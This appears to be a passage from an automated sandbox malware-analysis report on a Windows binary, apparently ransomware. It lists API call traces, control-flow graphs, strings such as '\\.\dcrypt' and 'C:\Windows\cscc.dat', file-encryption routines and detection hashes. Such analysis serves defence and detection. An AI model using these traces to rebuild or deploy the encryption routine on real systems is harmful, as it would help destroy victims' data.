                                                                      control_flow_graph 87 df5660-df56ae call df52d0 call df57b0 call df5810 94 df576a-df576d 87->94 95 df56b4-df56bc 87->95 97 df576f-df577d 94->97 98 df5799-df57af call df5150 call df5c9f 94->98 96 df56c0-df56c6 95->96 100 df56c8-df56cb 96->100 101 df56e6-df56e8 96->101 102 df577f-df5785 call df5510 97->102 103 df578a-df5796 call df4550 97->103 105 df56cd-df56d5 100->105 106 df56e2-df56e4 100->106 107 df56eb-df56ed 101->107 102->103 103->98 105->101 111 df56d7-df56e0 105->111 106->107 107->98 112 df56f3-df56f9 107->112 111->96 111->106 112->98 115 df56ff-df5756 CreateEventW SetConsoleCtrlHandler call df5b90 call df6285 call df5370 call df2020 WaitForSingleObject 112->115 124 df575d-df5768 Sleep 115->124 125 df5758 call df5bf0 115->125 124->98 125->124
                                                                      APIs
                                                                        • Part of subcall function 00DF52D0: GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00DF52DF
                                                                        • Part of subcall function 00DF52D0: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5301
                                                                        • Part of subcall function 00DF52D0: CloseHandle.KERNEL32(00000000), ref: 00DF5309
                                                                        • Part of subcall function 00DF52D0: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5320
                                                                        • Part of subcall function 00DF52D0: TlsSetValue.KERNEL32(?,00000000), ref: 00DF532E
                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      • CreateEventW.KERNEL32(?,00000001,?,?), ref: 00DF5704
                                                                      • SetConsoleCtrlHandler.KERNEL32(Function_00005620,00000001), ref: 00DF5716
                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 00DF574E
                                                                      • Sleep.KERNEL32(00001388), ref: 00DF5762
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Create$File$AttributesCloseConsoleCtrlDirectoryEnvironmentEventHandleHandlerObjectProcessSingleSleepSystemValueVariableWait_vswprintf_slstrcat
                                                                      • String ID: -id$rhaegal$schtasks /Delete /F /TN %ws
                                                                      • API String ID: 2413411667-2713465884
                                                                      • Opcode ID: 56b6abe943760310e7989bfd08224f813eef24835e0b7cb7239f3ddb32fdf12e
                                                                      • Instruction ID: 9a690ca7698b9cd0c3d179b0a9edb277cbc40815b0f138cfb956e94084061768
                                                                      • Opcode Fuzzy Hash: 56b6abe943760310e7989bfd08224f813eef24835e0b7cb7239f3ddb32fdf12e
                                                                      • Instruction Fuzzy Hash: B2313970A0070CABEB20BB70BC4ABBA3765DB11704F56C454F715A72DADA71DD888770
                                                                      Function 00DF52D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 55fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 127 df52d0-df52e8 GetFileAttributesW 128 df533b-df5342 call df42a0 127->128 129 df52ea-df5306 CreateFileW 127->129 134 df534e-df535c call df21f0 128->134 135 df5344 128->135 129->128 131 df5308-df5325 CloseHandle CreateFileW 129->131 131->128 133 df5327-df5339 TlsSetValue call df47e0 131->133 133->128 140 df535e-df5360 134->140 141 df5367-df536c 134->141 135->134 140->141
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00DF52DF
                                                                      • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5301
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF5309
                                                                      • CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF5320
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF532E
                                                                        • Part of subcall function 00DF47E0: FindFirstVolumeW.KERNEL32(?,00000104), ref: 00DF4802
                                                                        • Part of subcall function 00DF47E0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00DF4889
                                                                        • Part of subcall function 00DF47E0: GetLastError.KERNEL32 ref: 00DF488B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateFindVolume$AttributesCloseErrorFirstHandleLastNextValue
                                                                      • String ID: C:\Windows\cscc.dat$\\.\dcrypt
                                                                      • API String ID: 893940839-3761405209
                                                                      • Opcode ID: 81ca6280c54cb63e723e00a8284253aadea7060e9d2aded2bb9c3b12f9ba0e78
                                                                      • Instruction ID: f046bd865306fc16706ee9fe70d293c078f8690734da51ca004c0ac476cb34bb
                                                                      • Opcode Fuzzy Hash: 81ca6280c54cb63e723e00a8284253aadea7060e9d2aded2bb9c3b12f9ba0e78
                                                                      • Instruction Fuzzy Hash: C701F7313C1B083AE22017797C1FF6636889B05B20F795311B724FB0E0DAD2A5894B79
                                                                      Function 00DF3D00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 149 df3d00-df3d23 TlsGetValue 150 df3d4c-df3d66 DeviceIoControl 149->150 151 df3d25-df3d3c CreateFileW 149->151 152 df3d6e-df3d7b 150->152 154 df3d68 GetLastError 150->154 151->152 153 df3d3e-df3d46 TlsSetValue 151->153 155 df3d80-df3d85 152->155 153->150 154->152 155->155 156 df3d87-df3d90 155->156
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                      • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                      • DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                      • GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlCreateDeviceErrorFileLast
                                                                      • String ID: \\.\dcrypt
                                                                      • API String ID: 2163648868-1945893055
                                                                      • Opcode ID: 943e40dae523331f55cb3fea837b33222097b44cc713200fc8c006fbce36df04
                                                                      • Instruction ID: b8034cf34364874bf3749e460edf701cf60a7081f9aa03e09e4ce53587af90d2
                                                                      • Opcode Fuzzy Hash: 943e40dae523331f55cb3fea837b33222097b44cc713200fc8c006fbce36df04
                                                                      • Instruction Fuzzy Hash: C401B572602318BFE6209B6BAC48F773B6CE749720F164119FA00F72D0C6729E8487B1
                                                                      Function 00DF21F0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 157 df21f0-df2208 158 df2210-df2225 157->158 158->158 159 df2227-df225e TlsGetValue DeviceIoControl 158->159 160 df228f 159->160 161 df2260-df2265 159->161 162 df2294-df22a2 call df5c9f 160->162 161->162 163 df2267-df226f 161->163 165 df2271-df227e 163->165 165->165 167 df2280-df228e call df5c9f 165->167
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF224F
                                                                      • DeviceIoControl.KERNELBASE(00000000), ref: 00DF2256
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDeviceValue
                                                                      • String ID:
                                                                      • API String ID: 4261377879-0
                                                                      • Opcode ID: 70af6b64aa69526846bf18adf048df0e369901ef8754c7c01fddbfabaf3f7cd3
                                                                      • Instruction ID: 1575565ca19dc3975f71e8eb9c9b719c31c296c4d0f10e16f3b34cddaf0a00f3
                                                                      • Opcode Fuzzy Hash: 70af6b64aa69526846bf18adf048df0e369901ef8754c7c01fddbfabaf3f7cd3
                                                                      • Instruction Fuzzy Hash: 4D110631B002189BDB14DBB4DC06BBA73B8EF49300F4585ADE90AE7280EE759E44C764
                                                                      Function 00DF7D0C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 170 df7d0c-df7d1d call df7ce1 ExitProcess
                                                                      APIs
                                                                      • ___crtCorExitProcess.LIBCMT ref: 00DF7D14
                                                                        • Part of subcall function 00DF7CE1: GetModuleHandleW.KERNEL32(mscoree.dll,?,00DF7D19,?,?,00DF5EB5,000000FF,0000001E,00000001,00000000,00000000,?,00DFB13B,?,00000001,?), ref: 00DF7CEB
                                                                        • Part of subcall function 00DF7CE1: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DF7CFB
                                                                      • ExitProcess.KERNEL32 ref: 00DF7D1D
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                      • String ID:
                                                                      • API String ID: 2427264223-0
                                                                      • Opcode ID: e06733b35ec2e67cee95350cb471306b397d2044370bbf4d4c10b39a060c329a
                                                                      • Instruction ID: a9289a0e1b06a63dfa981d72132e71427958f5b99770754c563471b1295f6c7f
                                                                      • Opcode Fuzzy Hash: e06733b35ec2e67cee95350cb471306b397d2044370bbf4d4c10b39a060c329a
                                                                      • Instruction Fuzzy Hash: 1CB09B3100410C7FCB012F12DC0A8593F19EB40750B114010F51415031DF72DDD29590
                                                                      Function 00DF4223 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 187 df4223-df422a 188 df4230-df424b 187->188 189 df424d-df4252 call df3d00 188->189 190 df4257-df425e 188->190 189->190 190->188 192 df4260-df426b 190->192 194 df4270-df4275 192->194 194->194 195 df4277-df4283 EnumWindows call df3d00 194->195 197 df4288-df4296 call df5c9f 195->197
                                                                      APIs
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF427D
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ControlCreateDeviceEnumErrorFileLastWindows
                                                                      • String ID:
                                                                      • API String ID: 1452533794-0
                                                                      • Opcode ID: 1b2889faf86f069fde08161205120114adecf6f274e00193085c0f106132c745
                                                                      • Instruction ID: ea3fcdd449602ac31cc91e69abc7e216707c3851631fec49587326f51f621d1f
                                                                      • Opcode Fuzzy Hash: 1b2889faf86f069fde08161205120114adecf6f274e00193085c0f106132c745
                                                                      • Instruction Fuzzy Hash: 0CF0BB3050024C8EDB15EF60FC857F93760FB19304F0780BCEA469B155DA211D898BB1
                                                                      Function 00DF7F64 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 200 df7f64-df7f70 call df7e24 202 df7f75-df7f79 200->202
                                                                      APIs
                                                                      • _doexit.LIBCMT ref: 00DF7F70
                                                                        • Part of subcall function 00DF7E24: __lock.LIBCMT ref: 00DF7E32
                                                                        • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL(00E05CF0), ref: 00DF7E6E
                                                                        • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL ref: 00DF7E7F
                                                                        • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL(-00000004), ref: 00DF7EA5
                                                                        • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL ref: 00DF7EB8
                                                                        • Part of subcall function 00DF7E24: RtlDecodePointer.NTDLL ref: 00DF7EC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer$__lock_doexit
                                                                      • String ID:
                                                                      • API String ID: 3343572566-0
                                                                      • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                      • Instruction ID: a292a6d30d0570b4e35ff3e132693af6b897997cc2eeae3948082f9a387278de
                                                                      • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                      • Instruction Fuzzy Hash: E4B0923298420C33DA202542AC03F5A3A4987C1B60E2540A1FB0C191A1A9A2AD6580A9

                                                                      Non-executed Functions

                                                                      Function 00DF2800 Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 433COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • CloseHandle.KERNEL32(7269DA46), ref: 00DF2A65
                                                                      • _free.LIBCMT ref: 00DF2A6C
                                                                      • _free.LIBCMT ref: 00DF2A7F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CloseCreateFileHandle__snwprintf_malloc
                                                                      • String ID: $@$EXEFILE
                                                                      • API String ID: 798375799-665770621
                                                                      • Opcode ID: 7590244b2cfdf6bdfe3bd953592a3e2a136ce42379408a1d65e40c50a1b1f1ac
                                                                      • Instruction ID: 39d852d7881233d6ad3b10679e14dac51f0d9e408e3a62b2dc34cefc423142ab
                                                                      • Opcode Fuzzy Hash: 7590244b2cfdf6bdfe3bd953592a3e2a136ce42379408a1d65e40c50a1b1f1ac
                                                                      • Instruction Fuzzy Hash: 3AE1B6B1E0121C8BDB30DF64CC857BA77B5EB84350F1BC1A9EB09A7245D6719E818BB4
                                                                      Function 00DF19F0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 152fileencryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?), ref: 00DF1A11
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF1A2E
                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00DF1A71
                                                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000004,00000000,?,00000000), ref: 00DF1AB3
                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,?), ref: 00DF1ACA
                                                                      • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00DF1AE7
                                                                      • FlushViewOfFile.KERNEL32(00000000,?), ref: 00DF1AF6
                                                                      • _wprintf.LIBCMT ref: 00DF1B05
                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00DF1B0E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF1B15
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DF1B46
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 00DF1B50
                                                                      • SetEvent.KERNEL32(?), ref: 00DF1B6A
                                                                      • SetEvent.KERNEL32(?), ref: 00DF1B74
                                                                        • Part of subcall function 00DF1810: CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00DF18D9
                                                                        • Part of subcall function 00DF1810: CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00DF18F3
                                                                        • Part of subcall function 00DF1810: LocalAlloc.KERNEL32(00000040,?), ref: 00DF190A
                                                                        • Part of subcall function 00DF1810: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00DF1927
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CryptFile$HashView$CloseCreateDuplicateEventHandle$AllocDataDecryptDestroyFlushLocalMappingParamSizeUnmap_wprintf
                                                                      • String ID: %lS OK
                                                                      • API String ID: 2843717376-683714924
                                                                      • Opcode ID: 056396a027421afce76013057b2e9b0c68f2a454d5b50e0dd3e4371e989a1ee5
                                                                      • Instruction ID: f088b77c1c6567bc81bb8ffc6ea2126afb8c671065a0033670414c2e52a5cc0d
                                                                      • Opcode Fuzzy Hash: 056396a027421afce76013057b2e9b0c68f2a454d5b50e0dd3e4371e989a1ee5
                                                                      • Instruction Fuzzy Hash: 6F516C79A00219FFEB10DFA5CC84ABEB77DEB48340F158119FA15A7240E771AE458BB0
                                                                      Function 00DF1810 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 176encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF1710: GetFileSizeEx.KERNEL32(?,?), ref: 00DF1723
                                                                        • Part of subcall function 00DF1710: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00DF1744
                                                                        • Part of subcall function 00DF1710: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00DF175D
                                                                        • Part of subcall function 00DF1710: ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00DF1779
                                                                      • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00DF18D9
                                                                      • CryptHashData.ADVAPI32(00000000,?,00000004,00000000), ref: 00DF18F3
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00DF190A
                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00DF1927
                                                                      • LocalFree.KERNEL32(00000000), ref: 00DF19AE
                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00DF19B8
                                                                      • LocalFree.KERNEL32(?), ref: 00DF19C2
                                                                      • LocalFree.KERNEL32(?), ref: 00DF19DD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Local$CryptHash$FileFree$Alloc$DataDestroyDuplicateParamPointerReadSize
                                                                      • String ID: encrypted
                                                                      • API String ID: 1377777459-1467498611
                                                                      • Opcode ID: 90516eaf2560bed8c3c3ecad894892bfd66ec9409cf3426ec2fed2774a6e9330
                                                                      • Instruction ID: c0d6033374113260196bc3adb8277a4b3a7cc432382c850f4cc01dbd922055e7
                                                                      • Opcode Fuzzy Hash: 90516eaf2560bed8c3c3ecad894892bfd66ec9409cf3426ec2fed2774a6e9330
                                                                      • Instruction Fuzzy Hash: 76514679A00119EBDB24DF79C89077DBFB5AF45300F1DC195EA95DB241C632DE409BA0
                                                                      Function 00DF1E40 Relevance: 15.1, APIs: 10, Instructions: 88encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00DF1E4C
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00DF1E77
                                                                      • GetLastError.KERNEL32 ref: 00DF1E7D
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00DF1E93
                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 00DF1ED6
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 00DF1EE0
                                                                      • CryptDestroyKey.ADVAPI32 ref: 00DF1EE9
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DF1EF4
                                                                      • CloseHandle.KERNEL32(?,?,00000000), ref: 00DF1EFE
                                                                      • LocalFree.KERNEL32(?), ref: 00DF1F18
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$ContextDestroy$Acquire$CloseCreateErrorEventFreeHandleHashLastLocalRelease
                                                                      • String ID:
                                                                      • API String ID: 1700672282-0
                                                                      • Opcode ID: aa24dda8736faacdee503d7e6b22aececc9cc47ac0c2e3a23e27803901595f54
                                                                      • Instruction ID: 7f5cf66cf0ab438377d929b5b92451d67153016fdf1c9f04358da9c7906e2044
                                                                      • Opcode Fuzzy Hash: aa24dda8736faacdee503d7e6b22aececc9cc47ac0c2e3a23e27803901595f54
                                                                      • Instruction Fuzzy Hash: F2219A39240709AFE720ABB69C85F6777ACAF48751F158418FB02E6580EB62E9448B74
                                                                      Function 00DF1B80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PathCombineW.SHLWAPI(?,?,00E05624), ref: 00DF1BBF
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00DF1BDA
                                                                      • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 00DF1C07
                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 00DF1CB1
                                                                      • PathFindExtensionW.SHLWAPI(?), ref: 00DF1CF2
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 00DF1D3F
                                                                      • FindClose.KERNEL32(00000000), ref: 00DF1D4E
                                                                      Strings
                                                                      Memory Dump Source
